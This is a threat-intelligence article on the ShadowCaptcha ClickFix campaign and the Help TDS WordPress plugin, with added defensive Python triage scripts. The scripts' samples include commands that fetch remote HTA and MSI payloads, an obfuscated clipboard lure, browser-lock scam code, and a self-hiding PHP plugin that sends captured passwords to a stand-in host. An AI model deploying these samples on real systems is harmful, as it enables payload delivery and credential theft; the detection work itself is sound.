ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners
- Tuesday, 2nd September, 2025
- 00:01am
A new campaign, dubbed ShadowCaptcha, is abusing more than 100 compromised WordPress sites to push visitors to fake CAPTCHA verification pages. The pages use the ClickFix social-engineering technique to get the victim to run an attacker-supplied command, and that command in turn delivers information stealers, ransomware or cryptocurrency miners.
The campaign was first detected in August 2025 and codenamed ShadowCaptcha by the Israel National Digital Agency.
According to researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David and Yaniv Goldman, who published the findings, ShadowCaptcha combines social engineering, abuse of living-off-the-land binaries (LOLBins) and multi-stage payload delivery, which together let the operators gain and keep a foothold on the victim's machine.
Its objectives are broad: credential harvesting and browser-data exfiltration, cryptocurrency mining for profit, and ransomware deployment.
ShadowCaptcha: A Multi-faceted Cyberattack Campaign
Initial Compromise and Redirection Chain
The chain starts on WordPress sites into which malicious JavaScript has been injected. When a visitor loads an infected page, the script starts a redirection chain that ends on a fake Cloudflare or Google CAPTCHA verification page.
Dual Attack Vectors and Payload Delivery
From the fake CAPTCHA page the chain splits into two paths, depending on which ClickFix instructions the victim is shown. One path has the user open the Windows Run dialog and execute a command there. The other has the user save the rendered page as an HTML Application (HTA) file and run it with the mshta.exe utility. In both cases it is the victim, using a signed Windows binary, who launches the first stage, so the attackers need neither an exploit nor a downloaded executable to get past initial controls.
The Run dialog path ends with information stealers such as Lumma and Rhadamanthys, delivered either as MSI installers launched through msiexec.exe or as remotely hosted HTA files executed by mshta.exe. The saved-HTA path instead installs the Epsilon Red ransomware and encrypts the user's data.
Notably, the employment of ClickFix lures to coerce users into downloading malicious HTA files, specifically for the propagation of Epsilon Red ransomware, was previously documented by CloudSEK just last month, indicating a persistent and evolving threat landscape.
The ClickFix pages are made more convincing by obfuscated JavaScript that places the malicious command on the clipboard for the victim. The script calls navigator.clipboard.writeText, so the user never has to select or copy anything themselves; in practice the write happens from the click on the fake "I am not a robot" checkbox, since browsers only honor clipboard writes from a focused or user-activated page. The on-screen "verification" steps then walk the victim through pasting and running the command, a small step that is easy to follow and easy to miss as dangerous.
Evasion Tactics and Advanced Persistence
The attacks also build in evasion. The lure pages use anti-debugger tricks to frustrate inspection with browser developer tools, and the payloads lean on DLL side-loading, in which a legitimate signed executable is made to load a malicious DLL placed in its search path, so the malicious code runs under the name of a trusted process and is easier to keep resident.
In some ShadowCaptcha campaigns the payload is instead an XMRig-based cryptocurrency miner. These variants fetch their mining configuration from a Pastebin URL rather than carrying it hard-coded, so the operators can change pool and wallet details, the algorithm and CPU usage limits after infection without redeploying the miner. For defenders, a Pastebin fetch by a freshly installed binary is therefore worth alerting on.
When the miner is deployed, the attackers also drop WinRing0x64.sys, a legitimate but vulnerable hardware-access driver (it ships with XMRig and several hardware-monitoring tools) that exposes raw reads and writes of model-specific registers (MSRs) to user mode. The miner uses it to apply the MSR tweaks that raise RandomX hashrate, which is the "efficiency" the campaign is after. The same primitive hands any local process a kernel-level read/write capability, which is why the driver appears on vulnerable-driver blocklists such as LOLDrivers and is a good candidate for a WDAC or HVCI driver block rule.
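The two execution paths above (Run dialog and saved HTA) and the miner's driver drop each leave a distinct host artifact. The following is an added example written for this page, not code from the ShadowCaptcha researchers: triage rules run over a constructed set of Sysmon-style events. The event format is a simplified key=value rendering of Sysmon IDs 1 (ProcessCreate), 13 (RegistryEvent value set) and 6 (DriverLoad); the records, paths and IP addresses (documentation ranges) are made up for the example.

```python
"""Added example, not from the ShadowCaptcha report: triage rules for the two
ClickFix execution paths (Run dialog and saved .hta) and for the miner's
WinRing0 driver drop, run over constructed Sysmon-style events (simplified
key=value rendering of Sysmon IDs 1, 13 and 6; records below are constructed).
"""
import re
from pathlib import PureWindowsPath

SAMPLE_EVENTS = r"""
id=1|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta http://198.51.100.7/verify.hta
id=1|Image=C:\Windows\System32\msiexec.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=msiexec /i https://203.0.113.9/update.msi /qn
id=1|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine="C:\Windows\System32\mshta.exe" "C:\Users\bob\Downloads\captcha-verify.hta"
id=1|Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\Vendor\installer.exe|CommandLine=mshta "C:\Program Files\Vendor\setup.hta"
id=13|Image=C:\Windows\explorer.exe|TargetObject=HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a|Details=mshta http://198.51.100.7/verify.hta\1
id=6|ImageLoaded=C:\Users\bob\AppData\Local\Temp\WinRing0x64.sys
id=1|Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe notes.txt
"""

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "msiexec.exe", "cmd.exe",
           "curl.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)      # URL or UNC share
USER_PROFILE = re.compile(r"^[a-z]:\\users\\", re.I)        # saved under a user profile
HTA_PATH = re.compile(r'"([a-z]:\\[^"]+?\.hta)"|([a-z]:\\\S+?\.hta)\b', re.I)


def parse_events(text):
    """Turn key=value|key=value lines into dicts."""
    events = []
    for line in text.strip().splitlines():
        ev = {}
        for part in line.split("|"):
            key, _, value = part.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def basename(path):
    return PureWindowsPath(path.strip('"')).name.lower()


def hta_paths(cmd):
    return [quoted or bare for quoted, bare in HTA_PATH.findall(cmd)]


def triage(log_text):
    """Return (rule, evidence) pairs for events matching the ClickFix/miner rules."""
    findings = []
    for ev in parse_events(log_text):
        eid = ev.get("id")
        if eid == "1":
            image = basename(ev.get("Image", ""))
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            # Run-dialog path: explorer.exe spawns a LOLBin that pulls remote content
            if parent == "explorer.exe" and image in LOLBINS and REMOTE.search(cmd):
                findings.append(("clickfix_run_dialog_remote", cmd))
            # Saved-HTA path: mshta.exe runs an .hta the user saved into their profile
            if image == "mshta.exe":
                for path in hta_paths(cmd):
                    if USER_PROFILE.match(path):
                        findings.append(("clickfix_saved_hta", path))
        elif eid == "13" and "\\explorer\\runmru\\" in ev.get("TargetObject", "").lower():
            # RunMRU records what was typed into Win+R; a LOLBin or URL there is a ClickFix artifact
            details = ev.get("Details", "")
            first = details.split()[0].lower() if details.split() else ""
            if not first.endswith(".exe"):
                first += ".exe"
            if basename(first) in LOLBINS or REMOTE.search(details):
                findings.append(("clickfix_runmru_entry", details))
        elif eid == "6" and basename(ev.get("ImageLoaded", "")) == "winring0x64.sys":
            # WinRing0 is a known vulnerable driver; XMRig loads it for MSR access
            findings.append(("vulnerable_driver_winring0", ev["ImageLoaded"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_EVENTS):
        print(f"{rule:30} {evidence}")
```

The fourth and seventh sample events are deliberate non-matches: a vendor installer launching its own HTA from Program Files, and a plain notepad.exe launch, neither of which fires a rule. In a real deployment the same conditions translate directly into a SIEM query; the RunMRU rule is also useful in forensics, because the registry value survives after the process tree is gone.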
Geographic Reach and Compromise Vectors
An analysis of the infected WordPress sites reveals a widespread geographic distribution, with a majority located in countries such as Australia, Brazil, Italy, Canada, Colombia, and Israel. The victim organizations span diverse critical sectors, including technology, hospitality, legal and finance, healthcare, and real estate, demonstrating the indiscriminate nature of the campaign.
The exact way the WordPress sites were compromised is still under investigation. Yaniv Goldman told The Hacker News that there is medium confidence the attackers exploited known vulnerabilities in a range of WordPress plugins, and that some cases point to stolen administrator credentials being used to log in to the WordPress portal.
Mitigation Strategies Against ShadowCaptcha
Mitigating ShadowCaptcha takes several layers. Train users to recognize ClickFix-style lures, in particular any "verification" that asks them to press Win+R or paste a command. Segment the network to limit lateral movement. Keep WordPress core and plugins patched and require multi-factor authentication (MFA) on administrator accounts. On endpoints it is also worth constraining the LOLBins the campaign relies on, for example blocking mshta.exe where it has no business use and alerting when explorer.exe spawns mshta.exe, msiexec.exe or PowerShell with a URL on the command line.
The researchers note that ShadowCaptcha shows how social-engineering attacks have grown into full-spectrum operations: by tricking users into running built-in Windows tools and layering obfuscated scripts with a vulnerable driver, the operators obtain stealthy persistence and can switch between data theft, cryptocurrency mining and ransomware as it suits them.
The Evolving Landscape of Social Engineering Attacks
Help TDS: A Notorious Traffic Distribution System
The disclosure coincides with a GoDaddy analysis of the continuing evolution of Help TDS, a traffic distribution (or direction) system active since 2017 and linked to schemes such as VexTrio Viper. Help TDS supplies its partners and affiliates with pre-configured PHP code templates that are injected into compromised WordPress sites to redirect visitors to malicious destinations chosen by targeting criteria the operators define.
Technical Modus Operandi of Help TDS
Security researcher Denis Sinegubko explained that Help TDS operations specialize in tech support scams that use full-screen browser manipulation and exit-prevention techniques to trap victims on fake Microsoft Windows security alert pages. When that scam fails, the system falls back to other monetization, redirecting users to dating, cryptocurrency and sweepstakes scams.
Malware campaigns that have used Help TDS in recent years include DollyWay, Balada Injector and various DNS TXT redirects. The scam pages use JavaScript to force the browser into full-screen mode before displaying the fake security alert, and often put a counterfeit CAPTCHA challenge in front of the main content to evade automated scanners.
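Both page families described on this page, the ShadowCaptcha ClickFix lures that write a command to the clipboard and the Help TDS browser-lock scam pages, can be triaged statically from the page source. The following is an added example written for this page (not code from either research team): it flags the indicators, recovers the command passed to navigator.clipboard.writeText through common light obfuscation (String.fromCharCode, atob and "+" concatenation), and scores the full-screen/exit-prevention pattern. The two sample pages are constructed for the example and 198.51.100.7 is a documentation address.

```python
"""Added example, not from the ShadowCaptcha or Help TDS reports: static triage
of lure-page HTML/JS. Recovers the writeText payload through simple obfuscation
and scores full-screen / exit-prevention browser-lock patterns.
Sample pages are constructed for this example."""
import base64
import re

CLICKFIX_PAGE = r"""
<div class="cf-box"><h2>Verify you are human</h2>
<label><input type="checkbox" id="chk"> I'm not a robot</label></div>
<div id="steps" hidden>1. Press Win+R  2. Press Ctrl+V  3. Press Enter</div>
<script>
setInterval(function(){debugger;},50);
document.getElementById('chk').onclick=function(){
  var p=String.fromCharCode(109,115,104,116,97,32)+atob('aHR0cDovLzE5OC41MS4xMDAuNy92ZXJpZnkuaHRh');
  navigator.clipboard.writeText(p);
  document.getElementById('steps').hidden=false;};
</script>
"""
SCAM_PAGE = r"""
<div id="alert">Windows Security: your computer has been locked. Call Microsoft support now.</div>
<script>
document.documentElement.requestFullscreen();
window.onbeforeunload=function(){return 'Do not close this page';};
document.addEventListener('keydown',function(e){e.preventDefault();});
for(var i=0;i<50;i++){history.pushState({},'',location.href);}
</script>
"""
INDICATORS = {   # heuristic patterns, case-insensitive
    "clipboard_write": r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy",
    "run_dialog_instructions": r"Win(?:dows)?\s*\+\s*R|Ctrl\s*\+\s*V",
    "fake_captcha_text": r"not a robot|verify you are human|cloudflare|recaptcha",
    "anti_debugger": r"\bdebugger\b|outerWidth\s*-\s*innerWidth|devtools",
    "fullscreen_trap": r"requestFullscreen|webkitRequestFullScreen",
    "exit_prevention": r"beforeunload|history\.pushState",
    "keyboard_suppression": r"keydown[\s\S]{0,120}preventDefault",
    "tech_support_scam_text": r"windows (?:defender|security)|call (?:microsoft|support)",
}
WRITE_TEXT = re.compile(r"navigator\.clipboard\.writeText\(\s*(.+?)\s*\)\s*;")
LITERAL = re.compile(r"^(['\"`])(.*)\1$", re.S)
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")
ATOB = re.compile(r"atob\(\s*(['\"])(.*?)\1\s*\)")
IDENT = re.compile(r"^[A-Za-z_$][\w$]*$")


def split_concat(expr):
    """Split a JS expression on top-level '+' (outside quotes and parentheses).
    Escaped quotes inside string literals are not handled."""
    parts, cur, depth, quote = [], "", 0, None
    for ch in expr:
        if quote:
            quote = None if ch == quote else quote
        elif ch in "'\"`":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "+" and depth == 0:
            parts.append(cur.strip())
            cur = ""
            continue
        cur += ch
    parts.append(cur.strip())
    return [p for p in parts if p]


def eval_piece(piece):
    """Resolve one concatenation operand: literal, fromCharCode(...) or atob(...)."""
    m = LITERAL.match(piece)
    if m:
        return m.group(2)
    m = FROMCHARCODE.fullmatch(piece)
    if m:
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    m = ATOB.fullmatch(piece)
    if m:
        return base64.b64decode(m.group(2)).decode("utf-8", "replace")
    return f"<unresolved:{piece}>"


def clipboard_payload(page):
    """Recover the string passed to writeText, following one 'var x = ...' assignment."""
    m = WRITE_TEXT.search(page)
    if not m:
        return None
    expr = m.group(1)
    if IDENT.match(expr):
        decl = re.search(r"(?:var|let|const)\s+" + re.escape(expr) + r"\s*=\s*(.+?);", page)
        expr = decl.group(1) if decl else expr
    return "".join(eval_piece(p) for p in split_concat(expr))


def analyze(page):
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, page, re.I)]
    if "clipboard_write" in hits and ("run_dialog_instructions" in hits or "fake_captcha_text" in hits):
        verdict = "clickfix_lure"
    elif "fullscreen_trap" in hits and ("exit_prevention" in hits or "keyboard_suppression" in hits):
        verdict = "browser_lock_scam"
    else:
        verdict = "unknown"
    return {"verdict": verdict, "indicators": hits, "clipboard_payload": clipboard_payload(page)}


if __name__ == "__main__":
    for label, page in (("clickfix", CLICKFIX_PAGE), ("scam", SCAM_PAGE)):
        print(label, analyze(page))
```

The decoder deliberately stops at one level of indirection and three operand types; real lures often go further (array joins, hex escapes, runtime-built function names), so treat an "<unresolved:...>" fragment in the recovered payload as a prompt to open the page in an isolated browser rather than as a miss. Note that the anti-debugger indicator here is the `debugger` statement in a timer, the same trick that makes developer-tools inspection of these pages painful.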
The 'woocommerce_inputs' Plugin: A Covert Threat
Between late 2024 and August 2025 the Help TDS operators developed a malicious WordPress plugin named "woocommerce_inputs" to carry the core redirection function. Its capabilities have since grown to include credential harvesting, geographic filtering and a range of evasion techniques. The plugin is estimated to be installed on more than 10,000 WordPress sites.
To avoid attention from site owners and administrators, "woocommerce_inputs" masquerades as a legitimate WooCommerce component. It is not picked up by accident: attackers install it only after compromising the site, typically with stolen administrator credentials. A quick check is therefore to compare every plugin directory that carries WooCommerce branding against the official "woocommerce" slug and the site's own installation history.
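The behaviors attributed to the plugin above (WooCommerce branding on a non-official slug, credential capture, geographic filtering and redirects, evasion) each leave recognizable traces in PHP source. The following is an added example written for this page, not GoDaddy's analysis code and not the real "woocommerce_inputs" plugin: a heuristic scanner over wp-content/plugins that scores each plugin against those traces. The two plugins it scans are constructed stand-ins (a hypothetical "woocommerce-helper" and a benign footer plugin) written to exhibit and not exhibit the pattern; 203.0.113.9 is a documentation address.

```python
"""Added example, not GoDaddy's or the Help TDS operators' code: heuristic
triage of wp-content/plugins for WooCommerce impersonation, credential capture
sent off-site, visitor fingerprinting with redirects, self-hiding and
obfuscation. Both plugins below are constructed stand-ins for this example."""
import re
import tempfile
from pathlib import Path

OFFICIAL_WOOCOMMERCE_SLUG = "woocommerce"   # the real plugin's wordpress.org slug

RULES = {   # regexes applied case-insensitively to each PHP file
    "login_hook": r"add_(?:action|filter)\s*\(\s*['\"](?:wp_login|wp_authenticate|authenticate|login_form_login)['\"]",
    "raw_login_fields": r"\$_POST\s*\[\s*['\"](?:log|pwd|user_login|user_pass)['\"]\s*\]",
    "outbound_call": r"wp_remote_(?:post|get)\s*\(|curl_exec\s*\(|fsockopen\s*\(|file_get_contents\s*\(\s*['\"]https?://",
    "external_redirect": r"(?:wp_redirect|header)\s*\(\s*(?:['\"]Location:)?\s*['\"]?https?://",
    "visitor_fingerprinting": r"HTTP_USER_AGENT|HTTP_REFERER|REMOTE_ADDR|HTTP_CF_IPCOUNTRY|geoip|googlebot|bingbot",
    "self_hiding": r"add_filter\s*\(\s*['\"]all_plugins['\"]",
    "obfuscation": r"\b(?:eval|base64_decode|gzinflate|str_rot13|create_function)\s*\(",
}

ROGUE_PLUGIN = r"""<?php
/*
Plugin Name: WooCommerce Checkout Helper
Author: WooCommerce
*/
// hide this plugin from the admin plugin list
add_filter('all_plugins', function ($plugins) {
    unset($plugins['woocommerce-helper/woocommerce-helper.php']);
    return $plugins;
});
// capture the submitted password on successful login and send it off-site
add_action('wp_login', function ($login, $user) {
    $pwd = isset($_POST['pwd']) ? $_POST['pwd'] : '';
    wp_remote_post(base64_decode('aHR0cHM6Ly8yMDMuMC4xMTMuOS9jb2xsZWN0'),
        array('body' => array('u' => $login, 'p' => $pwd)));
}, 10, 2);
// redirect only real visitors from selected countries, never crawlers
add_action('template_redirect', function () {
    if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) return;
    if (($_SERVER['HTTP_CF_IPCOUNTRY'] ?? '') === 'US') { wp_redirect('https://203.0.113.9/go'); exit; }
});
"""

BENIGN_PLUGIN = r"""<?php
/*
Plugin Name: Site Footer Note
*/
add_action('wp_footer', function () { echo '<p>Maintained by the web team.</p>'; });
"""


def build_sample_tree():
    """Write the two constructed plugins into a temporary wp-content/plugins tree."""
    root = Path(tempfile.mkdtemp()) / "plugins"
    for slug, body in (("woocommerce-helper", ROGUE_PLUGIN), ("site-footer-note", BENIGN_PLUGIN)):
        (root / slug).mkdir(parents=True)
        (root / slug / f"{slug}.php").write_text(body)
    return root


def plugin_name(text):
    m = re.search(r"^\s*\*?\s*Plugin Name:\s*(.+)$", text, re.M)
    return m.group(1).strip() if m else None


def scan_plugin(plugin_dir):
    hits, name = set(), None
    for php in Path(plugin_dir).rglob("*.php"):
        text = php.read_text(errors="replace")
        name = name or plugin_name(text)
        hits.update(rule for rule, pat in RULES.items() if re.search(pat, text, re.I))
    # WooCommerce branding on anything but the official slug is impersonation
    if name and "woocommerce" in name.lower() and Path(plugin_dir).name != OFFICIAL_WOOCOMMERCE_SLUG:
        hits.add("brand_impersonation")
    # a login hook or raw login fields plus an outbound call is the harvesting pattern
    if "outbound_call" in hits and hits & {"login_hook", "raw_login_fields"}:
        hits.add("credential_harvesting")
    return {"name": name, "hits": sorted(hits), "score": len(hits)}


def scan_plugins(plugins_root):
    return {d.name: scan_plugin(d) for d in sorted(Path(plugins_root).iterdir()) if d.is_dir()}


if __name__ == "__main__":
    for slug, result in scan_plugins(build_sample_tree()).items():
        print(f"{slug:25} score={result['score']} {result['hits']}")
```

Point `scan_plugins` at a real `wp-content/plugins` directory to triage a live install. Individual rules are noisy on their own (many legitimate plugins call `wp_remote_post` or read `HTTP_USER_AGENT`); the combinations are what matter, which is why `credential_harvesting` and `brand_impersonation` are derived hits. The `all_plugins` filter check is worth keeping even as a single signal, since a plugin that removes itself from the admin list has very few honest reasons to do so.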
GoDaddy notes that the plugin serves both as a traffic-monetization tool and as a credential harvester, a clear evolution from its simpler initial redirect function into a malware-as-a-service offering.
By providing ready-made command-and-control (C2) infrastructure, standardized PHP injection templates and full-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals, letting a wider range of actors monetize compromised websites and feeding campaigns like ShadowCaptcha.